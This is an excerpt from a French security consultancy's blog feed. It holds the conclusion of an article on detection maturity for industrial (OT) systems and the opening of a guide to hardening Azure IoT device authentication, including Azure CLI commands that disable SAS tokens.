<p><span data-contrast="auto">Pour conclure, dans un contexte de convergence IT/OT, </span><b><span data-contrast="auto">déployer des EDR sur les serveurs et postes de travail industriels</span></b><span data-contrast="auto"> devient de plus en plus pertinent et selon les retours d’expérience de nos clients, permet d’étendre rapidement et efficacement la couverture de détection des périmètres industriels.  </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">Sondes de détection OT</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">Quelques chiffres concernant les sondes : </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span data-ccp-props="{&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><img loading="lazy" decoding="async" class="wp-image-27756 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR7.png" alt="" width="598" height="169" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR7.png 810w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR7-437x124.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR7-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR7-768x217.png 768w" sizes="auto, (max-width: 598px) 100vw, 598px" /></p>
<p><span data-contrast="auto">En ce qui concerne les sondes, l’écart entre ces deux chiffres met en lumière le défi que représente </span><b><span data-contrast="auto">leur déploiement à grande échelle</span></b><span data-contrast="auto"> et leur utilisation efficace pour la détection dans les réseaux industriels. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">En effet, les sondes collectent des informations via la capture du trafic réseau. Pour être efficaces, leur déploiement nécessite une sélection des points d’écoute en fonction des objectifs cibles. Ces points d’écoute doivent être adaptés à l’architecture spécifique de chaque site, souvent limité par la connaissance locale des équipes ou le manque de documentation. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">L’exploitation de ces sondes demande également une charge de travail importante. Elles ont tendance à générer un grand nombre de faux positifs, ce qui oblige les équipes à créer des règles de détection personnalisées et des playbooks pour filtrer et répondre efficacement. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">En conclusion, les sondes de détection OT sont peut-être populaires, mais</span><b><span data-contrast="auto"> les coûts et les ressources nécessaires pour leur déploiement et leur ajustement limitent leur pleine utilisation</span></b><span data-contrast="auto">. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">Commencer par couvrir l’essentiel avec la détection d’outils OT</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">En définitive, pour la détection OT, nous pensons qu’il faut commencer par des mesures basiques en tirant parti des outils « IT » afin d’assurer un premier niveau de couverture sur l’ensemble des sites, des applications critiques et de l’infrastructure en : </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<ul>
<li><b><span data-contrast="auto">Priorisant les assets critiques</span></b><span data-contrast="auto"> : Se concentrer sur les systèmes clés (MES, outils de sécurité, infrastructure réseau) essentiels à la production, en veillant à leur mise sous supervision avant d’étendre le déploiement aux couches inférieures du modèle de Purdue. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></li>
<li><b><span data-contrast="auto">Mettant en place une détection basique</span></b><span data-contrast="auto"> : Établir une détection fondamentale sur les sites et l’infrastructure pour permettre une identification en amont des incidents, avant de passer à des solutions OT plus avancées.</span>  </li>
</ul>
<h2 aria-level="3"><span data-contrast="none">S’entraîner et se tester</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h2>
<p><span data-contrast="auto">Les capacités de détection ne reposent pas uniquement sur le déploiement d’outils ; cette dernière partie des conclusions du benchmark se concentrera sur la capacité des équipes à les exploiter efficacement. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h3 aria-level="3"><span data-contrast="none">La nécessité de renforcer les connaissances spécifiques à l’OT</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">Les chiffres issus du benchmark révèlent une connaissance et adaptation limitées des équipes et des processus aux environnements industriel</span><span data-contrast="auto"> </span><span data-contrast="auto">: </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><img loading="lazy" decoding="async" class="wp-image-27758 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR8.png" alt="" width="572" height="142" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR8.png 814w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR8-437x108.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR8-71x18.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR8-768x191.png 768w" sizes="auto, (max-width: 572px) 100vw, 572px" /></p>
<p><span data-contrast="auto">Pour combler cet écart, les équipes doivent bénéficier de </span><b><span data-contrast="auto">formations spécifiques aux contextes industriels</span></b><span data-contrast="auto"> : une formation de base pour l’ensemble des analystes SOC, et une formation approfondie pour les spécialistes OT. </span> <span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-27760 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR9.png" alt="" width="838" height="211" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR9.png 838w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR9-437x110.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR9-71x18.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR9-768x193.png 768w" sizes="auto, (max-width: 838px) 100vw, 838px" /></p>
<p><span data-contrast="auto">De la même manière, </span><b><span data-contrast="auto">les processus d’investigation et de réponse doivent également être adaptés</span></b><span data-contrast="auto"> pour répondre aux spécificités des environnements industriels, en prenant en compte des priorités comme la disponibilité. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-27762 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR10.png" alt="" width="834" height="196" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR10.png 834w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR10-437x103.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR10-71x17.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR10-768x180.png 768w" sizes="auto, (max-width: 834px) 100vw, 834px" /></p>
<h3 aria-level="3"><span data-contrast="none">Testez</span> <span data-contrast="none">vos capacités de détection ! </span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559685&quot;:708,&quot;335559731&quot;:708,&quot;335559738&quot;:160,&quot;335559739&quot;:80}"> </span></h3>
<p><span data-contrast="auto">Enfin, l’amélioration de la détection commence par son évaluation, mais aujourd’hui… </span></p>
<p><img loading="lazy" decoding="async" class=" wp-image-27811 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR11-1.png" alt="" width="630" height="143" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR11-1.png 784w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR11-1-437x99.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR11-1-71x16.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR11-1-768x174.png 768w" sizes="auto, (max-width: 630px) 100vw, 630px" /></p>
<p><span data-contrast="auto">Seule une petite minorité de nos clients teste réellement ses capacités de détection, mais nous sommes convaincus de la valeur ajoutée des exercices de </span><b><span data-contrast="auto">purple teaming dans les environnements industriels</span></b><span data-contrast="auto">. Ces exercices collaboratifs avec le SOC OT, adaptés à son niveau de maturité et à ses objectifs, permettent de </span><b><span data-contrast="auto">tester et d’améliorer à la fois les outils de détection et les processus du SOC OT.</span></b><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-27766 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR12.png" alt="" width="832" height="550" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR12.png 832w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR12-289x191.png 289w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR12-59x39.png 59w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR12-768x508.png 768w" sizes="auto, (max-width: 832px) 100vw, 832px" /></p>
<p><span data-contrast="auto">Il est possible de commencer simplement</span><span data-contrast="auto"> </span><span data-contrast="auto">: en sélectionnant des environnements de production appropriés et en réalisant quelques tests basiques, comme l’insertion d’une clé USB contenant un échantillon de malware standard ou la tentative de quelques actions d’élévation de privilèges…</span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">On peut ainsi évaluer si l’EDR déployé sur un poste de travail connecté au SOC déclenchera une alerte et une investigation. </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<p><span data-contrast="auto">Ces exercices permettent </span><b><span data-contrast="auto">d’identifier les angles morts et d’ajuster en conséquence les outils déployés, les processus et les playbooks.</span></b><span data-contrast="auto"> </span><span data-ccp-props="{&quot;134233117&quot;:false,&quot;134233118&quot;:false,&quot;201341983&quot;:0,&quot;335551550&quot;:6,&quot;335551620&quot;:6,&quot;335559738&quot;:0,&quot;335559739&quot;:0,&quot;335559740&quot;:240}"> </span></p>
<h1><span data-contrast="none">Conclusion : Comment renforcer le faible niveau de maturité en matière de détection pour les systèmes industriels ?</span><span data-ccp-props="{&quot;134245418&quot;:true,&quot;134245529&quot;:true,&quot;335559738&quot;:360,&quot;335559739&quot;:80}"> </span></h1>
<p><span data-contrast="auto">La première conclusion du benchmark est claire : les </span><b><span data-contrast="auto">niveaux de maturité sont faibles</span></b><span data-contrast="auto">, et cette réponse est constante dans toutes les réponses recueillies. Comment améliorer cette maturité globalement faible en matière de détection pour les systèmes industriels ?</span><span data-ccp-props="{}"> </span></p>
<p><span data-contrast="auto">Voici les </span><b><span data-contrast="auto">principaux enseignements</span></b><span data-contrast="auto"> concernant les trois thématiques abordées dans cet article :</span><span data-ccp-props="{}"> </span></p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-27768 aligncenter" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR13.png" alt="" width="1276" height="502" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR13.png 1276w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR13-437x172.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR13-71x28.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2025/09/SOCOT1_FR13-768x302.png 768w" sizes="auto, (max-width: 1276px) 100vw, 1276px" /></p>
<p><span data-contrast="auto">N’hésitez pas à nous contacter pour échanger sur la manière de </span><b><span data-contrast="auto">renforcer vos capacités de détection</span></b><span data-contrast="auto"> et d’</span><b><span data-contrast="auto">évaluer votre maturité par rapport au marché</span></b><span data-contrast="auto"> !</span><span data-ccp-props="{}"> </span></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/">​Quelle détection pour l’OT ?  Situation actuelle &amp; perspectives</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2025/09/quelle-detection-pour-lot-situation-actuelle-perspectives/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Améliorer la sécurité de son infrastructure IoT : conseils de configuration et bonnes pratiques sur Azure IoT</title>
		<link>https://www.riskinsight-wavestone.com/2023/04/ameliorer-la-securite-de-son-infrastructure-iot-conseils-de-configuration-et-bonnes-pratiques-sur-azure-iot/</link>
					<comments>https://www.riskinsight-wavestone.com/2023/04/ameliorer-la-securite-de-son-infrastructure-iot-conseils-de-configuration-et-bonnes-pratiques-sur-azure-iot/#respond</comments>
		
		<dc:creator><![CDATA[Arnaud Soullié]]></dc:creator>
		<pubDate>Fri, 07 Apr 2023 13:00:00 +0000</pubDate>
				<category><![CDATA[Deep-dive]]></category>
		<category><![CDATA[IoT & smart products]]></category>
		<category><![CDATA[Azure]]></category>
		<category><![CDATA[IoT]]></category>
		<category><![CDATA[RBAC]]></category>
		<guid isPermaLink="false">https://www.riskinsight-wavestone.com/?p=20199</guid>

					<description><![CDATA[<p>Les plateformes IoT permettent de connecter, de gérer et de surveiller des flottes d’appareils. Les 3 leaders du Cloud, GCP, AWS et Azure ont chacun leur offre, dans un secteur particulièrement fragmenté, qui voit de nombreux acteurs en concurrence. Azure,...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2023/04/ameliorer-la-securite-de-son-infrastructure-iot-conseils-de-configuration-et-bonnes-pratiques-sur-azure-iot/">Améliorer la sécurité de son infrastructure IoT : conseils de configuration et bonnes pratiques sur Azure IoT</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[
<p style="text-align: justify;">Les plateformes IoT permettent de connecter, de gérer et de surveiller des flottes d’appareils. Les 3 leaders du Cloud, GCP, AWS et Azure ont chacun leur offre, dans un secteur particulièrement fragmenté, qui voit de nombreux acteurs en concurrence.</p>
<p style="text-align: justify;">Azure, ces dernières années, s’impose de plus en plus dans ce secteur, comme a pu le souligner le Gartner, qui les classe dans les<strong> leaders visionnaires</strong> des plateformes IIoT [1] en raison de ses capacités, et de sa couverture quasiment complète de tous les cas d’utilisation et secteurs d’activité.</p>
<p style="text-align: justify;">L’IoT, par nature souvent largement exposé, voire sur Internet, <strong>peut-être la cible d’attaques</strong>.</p>
<p style="text-align: justify;">Avant de passer à des <strong>recommandations</strong> spécifiques pour protéger vos dispositifs IoT et vos données, examinons comment les différents services d&rsquo;Azure IoT peuvent être utilisés ensemble pour <strong>créer des solutions IoT sécurisées</strong>.</p>
<h1 style="text-align: justify;">Présentation de l’offre Azure IoT</h1>
<p style="text-align: justify;">Microsoft Azure IoT est une <strong>plateforme de bout en bout</strong> pour la connectivité, l’analyse et la visualisation de données provenant d’appareils IoT. Elle offre également une <strong>interconnexion avec les autres services standards d’Azure</strong> comme <em>Azure Machine Learning </em>ou encore <em>Azure SQL Database. </em></p>
<p style="text-align: justify;">Azure IoT propose <strong>deux écosystèmes de solutions</strong> à ses clients :</p>
<ul style="text-align: justify;">
<li><em>Azure IoT Central</em> est une <strong>aPaaS</strong>, <em>application Platform as a Service</em>, <strong>entièrement managée</strong> qui <strong>simplifie la création de solutions IoT</strong>. Ce service est responsable de connecter, gérer et exploiter des flottes d’appareils, et fournit à une interface utilisateur de gestion. <em>Azure IoT Central</em> est en réalité <strong>un agrégat de différents services Azure IoT </strong>comme <em>Azure</em> <em>IoT Hub</em> ou encore <em>Azure</em> <em>IoT Hub Device Provisioning Service (DPS)</em>.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20200 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image1.png" alt="" width="836" height="543" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image1.png 836w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image1-294x191.png 294w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image1-60x39.png 60w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image1-768x499.png 768w" sizes="auto, (max-width: 836px) 100vw, 836px" /></p>
<p style="text-align: justify;"><em>Azure IoT Central </em><strong>propose des modèles d’application</strong> selon plusieurs domaines d’activité : Retail, Santé, Energie, Industrie, etc., et vise une mise en œuvre « clés en main ».  </p>
<ul style="text-align: justify;">
<li>Un <strong>écosystème personnalisé</strong> grâce aux différents services PaaS, <em>Platform as a Service</em>, d’Azure. Dans cet écosytème, deux services ; <em>Azure IoT Hub</em> et <em>Azure Digital Twins </em>sont les <strong>fondations d’une solution IoT</strong>. Nous les avons également combinés à <em>Azure Device Provisionning </em>et <em>Azure Device Update</em> pour une couverture des besoins cybersécurité optimale.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20202 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image2.png" alt="" width="830" height="519" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image2.png 830w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image2-305x191.png 305w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image2-62x39.png 62w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image2-768x480.png 768w" sizes="auto, (max-width: 830px) 100vw, 830px" /></p>
<p style="text-align: justify;">Ces deux écosystèmes permettent à Azure de <strong>répondre à tous types de besoins IoT et IIoT</strong> :</p>
<ul style="text-align: justify;">
<li><em>Azure</em> <em>IoT Central </em>est un très bon service si vous souhaitez développer rapidement une <strong>application peu complexe</strong> grâce à son catalogue de modèle d’application.</li>
<li>Si vous souhaitez une <strong>solution personnalisée</strong>, ou avec des fonctionnalités non supportées par <em>Azure</em> <em>IoT Central</em> : optez pour un écosystème fondé sur <em>Azure IoT Hub</em>.</li>
</ul>
<p style="text-align: justify;">Maintenant que nous avons une bonne compréhension des écosystèmes d&rsquo;Azure IoT, il est important de se concentrer sur la <strong>sécurisation de ces écosystèmes</strong>. Comment protéger efficacement des dispositifs IoT et des données lors de l&rsquo;utilisation des services Azure IoT ? C&rsquo;est ce que nous allons étudier dans les prochaines parties.</p>
<p> </p>
<h1 style="text-align: justify;">Préambule : l’outil Azure CLI</h1>
<p style="text-align: justify;">Afin de gérer des ressources Azure, Microsoft met à disposition plusieurs outils, la plupart étant utilisables en CLI (<em>Command Line Interface</em>, ou en lignes de commandes). L’outil proposant le plus de fonctionnalités pour la gestion étant<strong> Azure CLI</strong>.</p>
<p style="text-align: justify;">Cet outil, disponible pour les systèmes d’exploitation de type <strong>Windows</strong> et <strong>UNIX</strong>, permet notamment à un utilisateur membre d’un environnement Azure de <strong>gérer et d’obtenir des informations concernant des ressources Azure</strong>. Il est à noter que <strong>l’éventail des possibilités de cet outil varie en fonction des droits</strong> que possède l’utilisateur sur les ressources en question.</p>
<p style="text-align: justify;">Pour l’installer, Microsoft met à disposition <a href="https://learn.microsoft.com/fr-fr/cli/azure/install-azure-cli">une page dédiée</a> expliquant les étapes pour tout type d’environnement.</p>
<p style="text-align: justify;">Afin de l’utiliser, il suffit de <strong>se connecter</strong> à un compte utilisateur Azure via l’interface de commande choisie (<strong>Powershell</strong> ou <strong>Bash</strong>), puis d’<strong>entrer les commandes</strong> voulues. Lorsque l’utilisation de cet outil est terminée, <strong>une déconnexion</strong> du compte est recommandée.</p>
<p style="text-align: justify;"><strong>Une utilisation classique</strong> de cet outil est présentée ci-dessous :</p>
<table style="border-collapse: collapse; width: 100%;">
<tbody>
<tr>
<td style="width: 100%; background-color: #002060; border-color: #002060; border-style: solid;">
<p><span style="color: #ffffff;"><span style="color: #ffff00;">az</span> login [<span style="color: #808080;">-u</span> Nom d’utilisateur] [<span style="color: #808080;">&#8211;use-device</span>]</span></p>
<p><span style="color: #ffffff;">[Commandes Azure CLI] [Exemple : ]</span><br /><span style="color: #ffffff;"><span style="color: #ffff00;">az</span> resource list</span></p>
<p><span style="color: #ffffff;"><span style="color: #ffff00;">az</span> logout</span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">La documentation de cet outil, présentant et expliquant l’ensemble des commandes possibles, est disponible à <a href="https://learn.microsoft.com/fr-fr/cli/azure/reference-index?view=azure-cli-latest">cette adresse</a>.</p>
<p style="text-align: justify;">Cet outil sera utilisé par la suite lors d’exemple de manipulations techniques.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">1<sup>er</sup> vecteur de sécurisation : authentification des objets</h1>
<p style="text-align: justify;">L’authentification des appareils est cruciale pour une infrastructure Azure car elle permet de garantir que <strong>seuls les dispositifs autorisés puissent accéder aux ressources</strong> Cloud. Les services Azure IoT supporte <strong>deux principaux moyens d’authentification</strong> pour les dispositifs IoT :</p>
<ul style="text-align: justify;">
<li>Un <strong>Jeton SAS</strong> (<em>Shared Access Signature</em>, ou <strong>SAS Token</strong> en anglais) est une <strong>chaine de caractères</strong> permettant d’authentifier des appareils, ainsi que des services. Un jeton SAP à la structure suivante :</li>
</ul>
<p style="text-align: justify;"><em> <img loading="lazy" decoding="async" class="aligncenter wp-image-20204 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image3.png" alt="" width="768" height="164" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image3.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image3-437x93.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image3-71x15.png 71w" sizes="auto, (max-width: 768px) 100vw, 768px" /></em></p>
<p style="text-align: justify;">Ce type d’authentification a une <strong>durée de validité</strong> définie et des <strong>permissions</strong>, qui lui sont attribué à partir d’une <em>stratégie d’accès,</em> sur un <strong>périmètre donné</strong>. La <strong><em>signature</em></strong><em>, </em>quant à elle, est un élément crucial car elle est<strong> responsable de garantir la sécurité des communications</strong> entre l’objet et les services Azure, mais également de prouver l’identité du dispositif. Cette signature est générée à partir d’un secret qui doit être <strong>propre à chaque appareil</strong>.</p>
<ul style="text-align: justify;">
<li>Un <strong>certificat X.509</strong> [2] est un certificat numérique permettant une <strong>authentification forte</strong> de l’objet. Il contient des informations sur l’<strong>entité émettrice</strong> du certificat, la durée de validité du certificat mais également l’<strong>identité du <em>sujet</em></strong> (par exemple : l’objet). L’une des forces des certificats est la capacité à pouvoir créer des chaines de certificats, et ainsi <strong>créer des relations de confiance</strong>:</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20206 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image4.png" alt="" width="844" height="426" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image4.png 844w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image4-378x191.png 378w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image4-71x36.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/04/Image4-768x388.png 768w" sizes="auto, (max-width: 844px) 100vw, 844px" /></p>
<p style="text-align: justify;">En termes de sécurité, les certificats X.509 offrent un <strong>niveau de sécurité plus élevé</strong>, en supposant un algorithme cryptographique à l’état de l’art, car ils permettent de <strong>représenter des relations de confiance</strong>. Cependant, la gestion et l’utilisation des certificats peut impliquer une <strong>complexité supplémentaire</strong> pour un projet IoT.</p>
<p style="text-align: justify;">Afin de forcer l’utilisation des certificats X.509 pour authentifier des objets connectés, il est possible <strong>d’interdire les jetons SAS pour un IoT Hub</strong>. En effet, les IoT Hubs d’Azure <strong>possèdent</strong> <strong>trois propriétés liées à l’utilisation ou non des jetons SAS</strong> :  <em>disableLocalAuth</em>, <em>disableDeviceSAS</em> et <em>disableModuleSAS</em>. Par conséquent, la bonne pratique associée à l’interdiction des jetons SAS passe par <strong>l’attribution de ces trois paramètres à </strong><em>True</em>. Cette manipulation peut être réalisée à l’aide de l’outil <strong>Azure CLI</strong> :</p>
<table style="border-collapse: collapse; width: 100%;">
<tbody>
<tr>
<td style="width: 836px; background-color: #002060; border-color: #002060; border-style: solid;">
<p><span style="color: #ffffff;"><span style="color: #ffff00;">az <span style="color: #ffffff;">resource update <span style="color: #808080;">&#8211;resource-group</span> &lt;Resource_Group&gt; <span style="color: #808080;">-n</span> &lt;IoT_Hub&gt;<span style="color: #808080;"> &#8211;resource-type</span> Microsoft.Devices/IotHubs <span style="color: #808080;">&#8211;set</span> properties.disableDeviceSAS=true properties.disableModuleSAS=true properties.disableLocalAuth=true</span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">La vérification des valeurs de ces mêmes paramètres peut également être réalisée à l’aide d’<strong>Azure CLI</strong> :</p>
<table style="border-collapse: collapse; width: 100%;">
<tbody>
<tr>
<td style="width: 836px; background-color: #002060; border-color: #002060; border-style: solid;">
<p><span style="color: #ffffff;"><span style="color: #ffff00;"><span style="color: #ffffff;"><span style="color: #ffff00;">az</span> resource show <span style="color: #808080;">&#8212;resource-group</span> &lt;Resource_Group&gt; <span style="color: #808080;">-n</span> &lt;IoT_Hub&gt; <span style="color: #808080;">&#8211;resource-type</span> Microsoft.Devices/IotHubs | <span style="color: #ffff00;">Select-String</span> <span style="color: #33cccc;">« (disableLocalAuth|disableDeviceSAS|disableModuleSAS) »</span></span></span></span></p>
</td>
</tr>
</tbody>
</table>
<p style="text-align: justify;">Dans l’exemple de réponse ci-dessous, la propriété <em>disableDeviceSAS</em> a été correctement paramétrée, ce qui n’est pas le cas des deux autres.</p>
